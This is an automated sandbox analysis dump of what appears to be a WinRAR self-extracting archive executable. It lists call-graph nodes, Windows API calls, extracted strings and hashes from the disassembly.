28037->28040 28038 7ff741ec0819 28038->28037 28039 7ff741ec096e GetCommandLineW 28038->28039 28042 7ff741ec0980 28039->28042 28043 7ff741ec0b42 28039->28043 28041 7ff741ec0de2 28040->28041 28046 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 28041->28046 28047 7ff741e9129c 33 API calls 28042->28047 28044 7ff741ea6454 34 API calls 28043->28044 28045 7ff741ec0b51 28044->28045 28048 7ff741e91fa0 31 API calls 28045->28048 28051 7ff741ec0b68 BuildCatchObjectHelperInternal 28045->28051 28057 7ff741ec0de8 28046->28057 28050 7ff741ec09a5 28047->28050 28048->28051 28049 7ff741e91fa0 31 API calls 28052 7ff741ec0b93 SetEnvironmentVariableW GetLocalTime 28049->28052 28263 7ff741ebcad0 102 API calls 3 library calls 28050->28263 28051->28049 28056 7ff741ea3e28 swprintf 46 API calls 28052->28056 28053 7ff741ec1900 _com_raise_error 14 API calls 28053->28057 28055 7ff741ec09af 28055->28041 28059 7ff741ec09f9 OpenFileMappingW 28055->28059 28060 7ff741ec0adb 28055->28060 28058 7ff741ec0c18 SetEnvironmentVariableW GetModuleHandleW LoadIconW 28056->28058 28057->28053 28232 7ff741ebb014 LoadBitmapW 28058->28232 28062 7ff741ec0ad0 CloseHandle 28059->28062 28063 7ff741ec0a19 MapViewOfFile 28059->28063 28068 7ff741e9129c 33 API calls 28060->28068 28062->28043 28063->28062 28065 7ff741ec0a3f UnmapViewOfFile MapViewOfFile 28063->28065 28065->28062 28069 7ff741ec0a71 28065->28069 28067 7ff741ec0c75 28256 7ff741eb67b4 28067->28256 28071 7ff741ec0b00 28068->28071 28264 7ff741eba190 33 API calls 2 library calls 28069->28264 28268 7ff741ebfd0c 35 API calls 2 library calls 28071->28268 28075 7ff741ec0a81 28265 7ff741ebfd0c 35 API calls 2 library calls 28075->28265 28076 7ff741eb67b4 33 API calls 28079 7ff741ec0c87 DialogBoxParamW 28076->28079 28077 7ff741ec0b0a 28077->28043 28082 7ff741ec0dd7 28077->28082 28087 7ff741ec0cd3 28079->28087 28080 7ff741ec0a90 28266 7ff741eab9b4 102 API calls 28080->28266 28085 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 28082->28085 28083 7ff741ec0aa5 28267 7ff741eabb00 102 API calls 28083->28267 28085->28037 28086 7ff741ec0ab8 28090 7ff741ec0ac7 UnmapViewOfFile 28086->28090 28088 7ff741ec0ce6 Sleep 28087->28088 28089 7ff741ec0cec 28087->28089 28088->28089 28091 7ff741ec0cfa 28089->28091 28269 7ff741eb9f4c 49 API calls 2 library calls 28089->28269 28090->28062 28093 7ff741ec0d06 DeleteObject 28091->28093 28094 7ff741ec0d1f DeleteObject 28093->28094 28095 7ff741ec0d25 28093->28095 28094->28095 28096 7ff741ec0d6d 28095->28096 28097 7ff741ec0d5b 28095->28097 28259 7ff741eb94e4 28096->28259 28270 7ff741ebfe24 PeekMessageW GetMessageW TranslateMessage DispatchMessageW WaitForSingleObject 28097->28270 28100 7ff741ec0d60 CloseHandle 28100->28096 28104->27996 28107->27990 28108->27994 28110 7ff741ec281e __scrt_dllmain_crt_thread_attach 28109->28110 28110->28012 28110->28013 28112 7ff741ed0d4c 28111->28112 28113 7ff741ec2830 28112->28113 28116 7ff741ecec00 28112->28116 28113->28013 28115 7ff741ec51a0 7 API calls 2 library calls 28113->28115 28115->28013 28127 7ff741ecf398 EnterCriticalSection 28116->28127 28129 7ff741e991c8 35 API calls 28128->28129 28130 7ff741e91130 28129->28130 28133 7ff741ec29bc 34 API calls 28130->28133 28132 7ff741ec2a01 28132->28019 28133->28132 28135 7ff741ed0749 28134->28135 28136 7ff741ed073d 28134->28136 28135->28026 28139 7ff741ed0570 48 API calls 5 library calls 28136->28139 28138->28026 28139->28135 28271 7ff741ec2450 28140->28271 28143 7ff741eae026 GetProcAddress 28146 7ff741eae053 GetProcAddress 28143->28146 28147 7ff741eae03b 28143->28147 28144 7ff741eae07b 28145 7ff741eae503 28144->28145 28278 7ff741ecb788 39 API calls _snwprintf 28144->28278 28149 7ff741ea6454 34 API calls 28145->28149 28146->28144 28150 7ff741eae068 28146->28150 28147->28146 28152 7ff741eae50c 28149->28152 28150->28144 28151 7ff741eae3b0 28151->28145 28153 7ff741eae3ba 28151->28153 28154 7ff741ea7df4 47 API calls 28152->28154 28155 7ff741ea6454 34 API calls 28153->28155 28177 7ff741eae51a 28154->28177 28156 7ff741eae3c3 CreateFileW 28155->28156 28158 7ff741eae4f0 CloseHandle 28156->28158 28159 7ff741eae403 SetFilePointer 28156->28159 28161 7ff741e91fa0 31 API calls 28158->28161 28159->28158 28160 7ff741eae41c ReadFile 28159->28160 28160->28158 28162 7ff741eae444 28160->28162 28161->28145 28163 7ff741eae800 28162->28163 28164 7ff741eae458 28162->28164 28283 7ff741ec2624 8 API calls 28163->28283 28169 7ff741e9129c 33 API calls 28164->28169 28166 7ff741eae805 28167 7ff741eae53e CompareStringW 28167->28177 28168 7ff741e9129c 33 API calls 28168->28177 28174 7ff741eae48f 28169->28174 28170 7ff741ea8090 47 API calls 28170->28177 28172 7ff741eae63a 28175 7ff741eae7c2 28172->28175 28176 7ff741eae648 28172->28176 28173 7ff741e91fa0 31 API calls 28173->28177 28178 7ff741eae4db 28174->28178 28279 7ff741ead0a0 33 API calls 28174->28279 28180 7ff741e91fa0 31 API calls 28175->28180 28179 7ff741ea7eb0 47 API calls 28176->28179 28177->28167 28177->28168 28177->28170 28177->28173 28181 7ff741ea32bc 51 API calls 28177->28181 28202 7ff741eae5cc 28177->28202 28273 7ff741ea51a4 28177->28273 28182 7ff741e91fa0 31 API calls 28178->28182 28183 7ff741eae651 28179->28183 28184 7ff741eae7cb 28180->28184 28181->28177 28185 7ff741eae4e5 28182->28185 28186 7ff741ea51a4 9 API calls 28183->28186 28188 7ff741e91fa0 31 API calls 28184->28188 28189 7ff741e91fa0 31 API calls 28185->28189 28190 7ff741eae656 28186->28190 28187 7ff741e9129c 33 API calls 28187->28202 28191 7ff741eae7d5 28188->28191 28189->28158 28192 7ff741eae706 28190->28192 28199 7ff741eae661 28190->28199 28194 7ff741ec2320 _handle_error 8 API calls 28191->28194 28195 7ff741eada98 48 API calls 28192->28195 28193 7ff741ea8090 47 API calls 28193->28202 28196 7ff741eae7e4 28194->28196 28197 7ff741eae74b AllocConsole 28195->28197 28196->28032 28200 7ff741eae6fb 28197->28200 28201 7ff741eae755 GetCurrentProcessId AttachConsole 28197->28201 28198 7ff741e91fa0 31 API calls 28198->28202 28205 7ff741eaaae0 48 API calls 28199->28205 28282 7ff741e919e0 31 API calls _invalid_parameter_noinfo_noreturn 28200->28282 28203 7ff741eae76c 28201->28203 28202->28172 28202->28187 28202->28193 28202->28198 28204 7ff741ea32bc 51 API calls 28202->28204 28210 7ff741eae778 GetStdHandle WriteConsoleW Sleep FreeConsole 28203->28210 28204->28202 28207 7ff741eae6a5 28205->28207 28209 7ff741eada98 48 API calls 28207->28209 28208 7ff741eae7b9 ExitProcess 28211 7ff741eae6c3 28209->28211 28210->28200 28212 7ff741eaaae0 48 API calls 28211->28212 28213 7ff741eae6ce 28212->28213 28280 7ff741eadc2c 33 API calls 28213->28280 28215 7ff741eae6da 28281 7ff741e919e0 31 API calls _invalid_parameter_noinfo_noreturn 28215->28281 28218 7ff741eadd88 28217->28218 28219 7ff741eb9481 OleInitialize 28218->28219 28220 7ff741eb94a7 28219->28220 28221 7ff741eb94cd SHGetMalloc 28220->28221 28221->28035 28223 7ff741eb9a49 28222->28223 28225 7ff741eb9a4e BuildCatchObjectHelperInternal 28222->28225 28224 7ff741e91fa0 31 API calls 28223->28224 28224->28225 28226 7ff741e91fa0 31 API calls 28225->28226 28228 7ff741eb9a7d BuildCatchObjectHelperInternal 28225->28228 28226->28228 28227 7ff741e91fa0 31 API calls 28229 7ff741eb9aac BuildCatchObjectHelperInternal 28227->28229 28228->28227 28228->28229 28230 7ff741e91fa0 31 API calls 28229->28230 28231 7ff741eb9adb BuildCatchObjectHelperInternal 28229->28231 28230->28231 28231->28038 28231->28231 28233 7ff741ebb046 28232->28233 28234 7ff741ebb03e 28232->28234 28235 7ff741ebb063 28233->28235 28236 7ff741ebb04e GetObjectW 28233->28236 28284 7ff741eb8624 FindResourceW 28234->28284 28238 7ff741eb849c 4 API calls 28235->28238 28236->28235 28240 7ff741ebb078 28238->28240 28239 7ff741ebb0ce 28251 7ff741ea98ac 28239->28251 28240->28239 28241 7ff741ebb09e 28240->28241 28242 7ff741eb8624 11 API calls 28240->28242 28299 7ff741eb8504 GetDC GetDeviceCaps GetDeviceCaps ReleaseDC 28241->28299 28244 7ff741ebb08a 28242->28244 28244->28241 28246 7ff741ebb092 DeleteObject 28244->28246 28245 7ff741ebb0a7 28247 7ff741eb84cc 4 API calls 28245->28247 28246->28241 28248 7ff741ebb0b2 28247->28248 28300 7ff741eb8df4 17 API calls _handle_error 28248->28300 28250 7ff741ebb0bf DeleteObject 28250->28239 28301 7ff741ea98dc 28251->28301 28253 7ff741ea98ba 28368 7ff741eaa43c GetModuleHandleW FindResourceW 28253->28368 28255 7ff741ea98c2 28255->28067 28257 7ff741ec21d0 33 API calls 28256->28257 28258 7ff741eb67fa 28257->28258 28258->28076 28260 7ff741eb9501 28259->28260 28261 7ff741eb950a OleUninitialize 28260->28261 28262 7ff741efe330 28261->28262 28263->28055 28264->28075 28265->28080 28266->28083 28267->28086 28268->28077 28269->28091 28270->28100 28272 7ff741eadff4 GetModuleHandleW 28271->28272 28272->28143 28272->28144 28274 7ff741ea51c8 GetVersionExW 28273->28274 28275 7ff741ea51fb 28273->28275 28274->28275 28276 7ff741ec2320 _handle_error 8 API calls 28275->28276 28277 7ff741ea5228 28276->28277 28277->28177 28278->28151 28279->28174 28280->28215 28281->28200 28282->28208 28283->28166 28285 7ff741eb879b 28284->28285 28286 7ff741eb864f SizeofResource 28284->28286 28285->28233 28286->28285 28287 7ff741eb8669 LoadResource 28286->28287 28287->28285 28288 7ff741eb8682 LockResource 28287->28288 28288->28285 28289 7ff741eb8697 GlobalAlloc 28288->28289 28289->28285 28290 7ff741eb86b8 GlobalLock 28289->28290 28291 7ff741eb8792 GlobalFree 28290->28291 28292 7ff741eb86ca BuildCatchObjectHelperInternal 28290->28292 28291->28285 28293 7ff741eb86d8 CreateStreamOnHGlobal 28292->28293 28294 7ff741eb86f6 GdipAlloc 28293->28294 28295 7ff741eb8789 GlobalUnlock 28293->28295 28296 7ff741eb870b 28294->28296 28295->28291 28296->28295 28297 7ff741eb8772 28296->28297 28298 7ff741eb875a GdipCreateHBITMAPFromBitmap 28296->28298 28297->28295 28298->28297 28299->28245 28300->28250 28304 7ff741ea98fe _snwprintf 28301->28304 28302 7ff741ea9973 28378 7ff741ea68b0 48 API calls 28302->28378 28304->28302 28306 7ff741ea9a89 28304->28306 28305 7ff741e91fa0 31 API calls 28308 7ff741ea99fd 28305->28308 28306->28308 28311 7ff741e920b0 33 API calls 28306->28311 28307 7ff741ea997d BuildCatchObjectHelperInternal 28307->28305 28309 7ff741eaa42e 28307->28309 28313 7ff741ea24c0 54 API calls 28308->28313 28310 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 28309->28310 28312 7ff741eaa434 28310->28312 28311->28308 28315 7ff741ec7904 _invalid_parameter_noinfo_noreturn 31 API calls 28312->28315 28314 7ff741ea9a1a 28313->28314 28316 7ff741ea9a22 28314->28316 28323 7ff741ea9aad 28314->28323 28319 7ff741eaa43a 28315->28319 28317 7ff741ea204c 100 API calls 28316->28317 28320 7ff741ea9a2b 28317->28320 28318 7ff741ea9b17 28370 7ff741eca450 28318->28370 28320->28312 28322 7ff741ea9a66 28320->28322 28327 7ff741ec2320 _handle_error 8 API calls 28322->28327 28323->28318 28324 7ff741ea8e58 33 API calls 28323->28324 28324->28323 28326 7ff741eca450 31 API calls 28339 7ff741ea9b57 __vcrt_InitializeCriticalSectionEx 28326->28339 28328 7ff741eaa40e 28327->28328 28328->28253 28329 7ff741ea9c89 28331 7ff741ea2aa0 101 API calls 28329->28331 28342 7ff741ea9d5c 28329->28342 28330 7ff741ea2bb0 101 API calls 28330->28339 28333 7ff741ea9ca1 28331->28333 28332 7ff741ea28d0 104 API calls 28332->28339 28334 7ff741ea28d0 104 API calls 28333->28334 28333->28342 28340 7ff741ea9cc9 28334->28340 28335 7ff741ea204c 100 API calls 28337 7ff741eaa3f5 28335->28337 28336 7ff741ea2aa0 101 API calls 28336->28339 28338 7ff741e91fa0 31 API calls 28337->28338 28338->28322 28339->28329 28339->28330 28339->28332 28339->28336 28339->28342 28340->28342 28363 7ff741ea9cd7 __vcrt_InitializeCriticalSectionEx 28340->28363 28379 7ff741eb0bbc MultiByteToWideChar 28340->28379 28342->28335 28343 7ff741eaa1ec 28358 7ff741eaa2c2 28343->28358 28385 7ff741eccf90 31 API calls 2 library calls 28343->28385 28345 7ff741eaa157 28345->28343 28382 7ff741eccf90 31 API calls 2 library calls 28345->28382 28347 7ff741eaa14b 28347->28253 28349 7ff741eaa2ae 28349->28358 28387 7ff741ea8cd0 33 API calls 2 library calls 28349->28387 28350 7ff741eaa3a2 28352 7ff741eca450 31 API calls 28350->28352 28351 7ff741eaa249 28386 7ff741ecb7bc 31 API calls _invalid_parameter_noinfo_noreturn 28351->28386 28354 7ff741eaa3cb 28352->28354 28356 7ff741eca450 31 API calls 28354->28356 28355 7ff741eaa16d 28383 7ff741ecb7bc 31 API calls _invalid_parameter_noinfo_noreturn 28355->28383 28356->28342 28358->28350 28359 7ff741ea8e58 33 API calls 28358->28359 28359->28358 28360 7ff741eaa1d8 28360->28343 28384 7ff741ea8cd0 33 API calls 2 library calls 28360->28384 28361 7ff741eb0f68 WideCharToMultiByte 28361->28363 28363->28342 28363->28343 28363->28345 28363->28347 28363->28361 28364 7ff741eaa429 28363->28364 28380 7ff741eaaa88 45 API calls 2 library calls 28363->28380 28381 7ff741eca270 31 API calls 2 library calls 28363->28381 28388 7ff741ec2624 8 API calls 28364->28388 28369 7ff741eaa468 28368->28369 28369->28255 28371 7ff741eca47d 28370->28371 28377 7ff741eca492 28371->28377 28389 7ff741ecd69c 15 API calls abort 28371->28389 28373 7ff741eca487 28390 7ff741ec78e4 31 API calls _invalid_parameter_noinfo 28373->28390 28374 7ff741ec2320 _handle_error 8 API calls 28376 7ff741ea9b37 28374->28376 28376->28326 28377->28374 28378->28307 28379->28363 28380->28363 28381->28363 28382->28355 28383->28360 28384->28343 28385->28351 28386->28349 28387->28358 28388->28309 28389->28373 28390->28377 27935 7ff741ecd94c 27936 7ff741ecd997 27935->27936 27940 7ff741ecd95b abort 27935->27940 27942 7ff741ecd69c 15 API calls abort 27936->27942 27938 7ff741ecd97e HeapAlloc 27939 7ff741ecd995 27938->27939 27938->27940 27940->27936 27940->27938 27941 7ff741ecbbc0 abort 2 API calls 27940->27941 27941->27940 27942->27939 27945 7ff741ec154b 27946 7ff741ec14a2 27945->27946 27947 7ff741ec1900 _com_raise_error 14 API calls 27946->27947 27948 7ff741ec14e1 27947->27948 27948->27948 27968 7ff741ecbf2c 27975 7ff741ecbc34 27968->27975 27980 7ff741ecd440 35 API calls 2 library calls 27975->27980 27977 7ff741ecbc3f 27981 7ff741ecd068 35 API calls abort 27977->27981 27980->27977
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Item$Message$_invalid_parameter_noinfo_noreturn$Send$DialogText$File$ErrorLast$CloseFindFocusLoadStringViewWindow$CommandConcurrency::cancel_current_taskCountCreateDispatchEnableExecuteFirstHandleLineMappingParamShellSleepTickTranslateUnmap
      • String ID: %s %s$-el -s2 "-d%s" "-sp%s"$@$LICENSEDLG$REPLACEFILEDLG$STARTDLG$__tmp_rar_sfx_access_check_$p$runas$winrarsfxmappingfile.tmp
      • API String ID: 255727823-2702805183
      • Opcode ID: a0404b779c4ee16cf50a5e9d1e10fbcb842fabb91e047cae84fb8ecf6bba8e74
      • Instruction ID: f48d070d1491bbc323bc1e77ee086ca4c6604d1ddc9e6c7ce58bd53cf234673e
      • Opcode Fuzzy Hash: a0404b779c4ee16cf50a5e9d1e10fbcb842fabb91e047cae84fb8ecf6bba8e74
      • Instruction Fuzzy Hash: 70D2936AA1C6A3D1EB22FB25E8502F9A351FF86782FC44231D95D076A5DFBCE544C320
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task$FileMessageMoveSend$ChangeDialogItemNotifyPathTemp
      • String ID: .lnk$.tmp$<br>$@set:user$HIDE$MAX$MIN$ProgramFilesDir$Software\Microsoft\Windows\CurrentVersion$lnk
      • API String ID: 4009890540-3916287355
      • Opcode ID: 19578e4233ada1ea9e691022a7e54d5e6d40b94e5858b6d29fa0a014024e33bd
      • Instruction ID: c98c845ae8d45102d0fd3b28ddbc5a856b30cfee13a7a8570b4370937c9c6f34
      • Opcode Fuzzy Hash: 19578e4233ada1ea9e691022a7e54d5e6d40b94e5858b6d29fa0a014024e33bd
      • Instruction Fuzzy Hash: 4513BF26B08BA2D9EB12FF64D8402FC67A1FB41799F800635DA1D17AD9DFB8D584C360

      Control-flow Graph

      • Executed
      • Not Executed
      control_flow_graph 1464 7ff741ec0754-7ff741ec0829 call 7ff741eadfd0 call 7ff741ea62dc call 7ff741eb946c call 7ff741ec3cf0 call 7ff741eb9a14 1475 7ff741ec0860-7ff741ec0883 1464->1475 1476 7ff741ec082b-7ff741ec0840 1464->1476 1479 7ff741ec0885-7ff741ec089a 1475->1479 1480 7ff741ec08ba-7ff741ec08dd 1475->1480 1477 7ff741ec0842-7ff741ec0855 1476->1477 1478 7ff741ec085b call 7ff741ec220c 1476->1478 1477->1478 1483 7ff741ec0ddd-7ff741ec0de2 call 7ff741ec7904 1477->1483 1478->1475 1485 7ff741ec08b5 call 7ff741ec220c 1479->1485 1486 7ff741ec089c-7ff741ec08af 1479->1486 1481 7ff741ec08df-7ff741ec08f4 1480->1481 1482 7ff741ec0914-7ff741ec0937 1480->1482 1487 7ff741ec090f call 7ff741ec220c 1481->1487 1488 7ff741ec08f6-7ff741ec0909 1481->1488 1489 7ff741ec0939-7ff741ec094e 1482->1489 1490 7ff741ec096e-7ff741ec097a GetCommandLineW 1482->1490 1501 7ff741ec0de3-7ff741ec0df0 call 7ff741ec7904 1483->1501 1485->1480 1486->1483 1486->1485 1487->1482 1488->1483 1488->1487 1494 7ff741ec0950-7ff741ec0963 1489->1494 1495 7ff741ec0969 call 7ff741ec220c 1489->1495 1497 7ff741ec0980-7ff741ec09b7 call 7ff741ec797c call 7ff741e9129c call 7ff741ebcad0 1490->1497 1498 7ff741ec0b47-7ff741ec0b5e call 7ff741ea6454 1490->1498 1494->1483 1494->1495 1495->1490 1522 7ff741ec09b9-7ff741ec09cc 1497->1522 1523 7ff741ec09ec-7ff741ec09f3 1497->1523 1506 7ff741ec0b60-7ff741ec0b85 call 7ff741e91fa0 call 7ff741ec3640 1498->1506 1507 7ff741ec0b89-7ff741ec0ce4 call 7ff741e91fa0 SetEnvironmentVariableW GetLocalTime call 7ff741ea3e28 SetEnvironmentVariableW GetModuleHandleW LoadIconW call 7ff741ebb014 call 7ff741ea98ac call 7ff741eb67b4 * 2 DialogBoxParamW call 7ff741eb68a8 * 2 1498->1507 1512 7ff741ec0df5-7ff741ec0e2f call 7ff741ec1900 1501->1512 1506->1507 1571 7ff741ec0ce6 Sleep 1507->1571 1572 7ff741ec0cec-7ff741ec0cf3 1507->1572 1521 7ff741ec0e34-7ff741ec0eed 1512->1521 1521->1512 1527 7ff741ec09e7 call 7ff741ec220c 1522->1527 1528 7ff741ec09ce-7ff741ec09e1 1522->1528 1529 7ff741ec09f9-7ff741ec0a13 OpenFileMappingW 1523->1529 1530 7ff741ec0adb-7ff741ec0b12 call 7ff741ec797c call 7ff741e9129c call 7ff741ebfd0c 1523->1530 1527->1523 1528->1501 1528->1527 1534 7ff741ec0ad0-7ff741ec0ad9 CloseHandle 1529->1534 1535 7ff741ec0a19-7ff741ec0a39 MapViewOfFile 1529->1535 1530->1498 1554 7ff741ec0b14-7ff741ec0b27 1530->1554 1534->1498 1535->1534 1539 7ff741ec0a3f-7ff741ec0a6f UnmapViewOfFile MapViewOfFile 1535->1539 1539->1534 1543 7ff741ec0a71-7ff741ec0aca call 7ff741eba190 call 7ff741ebfd0c call 7ff741eab9b4 call 7ff741eabb00 call 7ff741eabb70 UnmapViewOfFile 1539->1543 1543->1534 1557 7ff741ec0b42 call 7ff741ec220c 1554->1557 1558 7ff741ec0b29-7ff741ec0b3c 1554->1558 1557->1498 1558->1557 1561 7ff741ec0dd7-7ff741ec0ddc call 7ff741ec7904 1558->1561 1561->1483 1571->1572 1574 7ff741ec0cf5 call 7ff741eb9f4c 1572->1574 1575 7ff741ec0cfa-7ff741ec0d1d call 7ff741eab8e0 DeleteObject 1572->1575 1574->1575 1579 7ff741ec0d1f DeleteObject 1575->1579 1580 7ff741ec0d25-7ff741ec0d2c 1575->1580 1579->1580 1581 7ff741ec0d48-7ff741ec0d59 1580->1581 1582 7ff741ec0d2e-7ff741ec0d35 1580->1582 1584 7ff741ec0d6d-7ff741ec0d7a 1581->1584 1585 7ff741ec0d5b-7ff741ec0d67 call 7ff741ebfe24 CloseHandle 1581->1585 1582->1581 1583 7ff741ec0d37-7ff741ec0d43 call 7ff741e9ba0c 1582->1583 1583->1581 1588 7ff741ec0d9f-7ff741ec0da4 call 7ff741eb94e4 1584->1588 1589 7ff741ec0d7c-7ff741ec0d89 1584->1589 1585->1584 1594 7ff741ec0da9-7ff741ec0dd6 call 7ff741ec2320 1588->1594 1592 7ff741ec0d99-7ff741ec0d9b 1589->1592 1593 7ff741ec0d8b-7ff741ec0d93 1589->1593 1592->1588 1596 7ff741ec0d9d 1592->1596 1593->1588 1595 7ff741ec0d95-7ff741ec0d97 1593->1595 1595->1588 1596->1588
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: File$EnvironmentHandleVariableView$_invalid_parameter_noinfo_noreturn$AddressCloseCurrentDeleteDirectoryModuleObjectProcUnmap$CommandDialogIconInitializeLineLoadLocalMallocMappingOpenParamSleepTimeswprintf
      • String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
      • API String ID: 1048086575-3710569615
      • Opcode ID: 7fb843965e060d2caf1f274bd47349aa60f49b36b68f6f054b76b7ae27a5abf6
      • Instruction ID: ec7057f854c51e28f3a1d4b1d1d383690c333362dd7bb15bc5486aa18e1685de
      • Opcode Fuzzy Hash: 7fb843965e060d2caf1f274bd47349aa60f49b36b68f6f054b76b7ae27a5abf6
      • Instruction Fuzzy Hash: CC126479A1C7A2C1EB12FB24E8452B9E361FF85795FC44231DA9D06A95EFBCE140C320

      Control-flow Graph

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWideswprintf
      • String ID: $%s:$CAPTION
      • API String ID: 2100155373-404845831
      • Opcode ID: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
      • Instruction ID: c643f658e2f45d2c09b88654c9fef133d3bd011acff044f8e1db2f705a500a31
      • Opcode Fuzzy Hash: 1224945cd41bf140f0dcf37f1b002595631e4f701a4b658f84a72e9da714e3d9
      • Instruction Fuzzy Hash: E791F53AB1C662CAE715BF29A800669E7A1FBC4B85F805435EE4D47B58DF7CE805CB10

      Control-flow Graph

      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
      • String ID: PNG
      • API String ID: 211097158-364855578
      • Opcode ID: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
      • Instruction ID: dedd18f355c568ba6b43a83a63ce3175bd711ef0b84b3a897942b1cf187b750f
      • Opcode Fuzzy Hash: c8606208415c3a11eb94d5df8c8f8595ea54109f2541637b646828bce78d4013
      • Instruction Fuzzy Hash: 9C413029A4DA23C1EB06FB16D844775A3A0BF84B96F880535DE1D47364EFBCE446C360
      APIs
      Strings
      Memory Dump Source
      • Source File: 00000003.00000002.2172158543.00007FF741E91000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF741E90000, based on PE: true
      • Associated: 00000003.00000002.2172142743.00007FF741E90000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172195567.00007FF741ED8000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EEB000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172239983.00007FF741EF4000.00000004.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFA000.00000002.00000001.01000000.00000005.sdmpDownload File
      • Associated: 00000003.00000002.2172275936.00007FF741EFE000.00000002.00000001.01000000.00000005.sdmpDownload File
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_3_2_7ff741e90000_mh.jbxd
      Similarity
      • API ID: _invalid_parameter_noinfo_noreturn
      • String ID: __tmp_reference_source_
      • API String ID: 3668304517-685763994
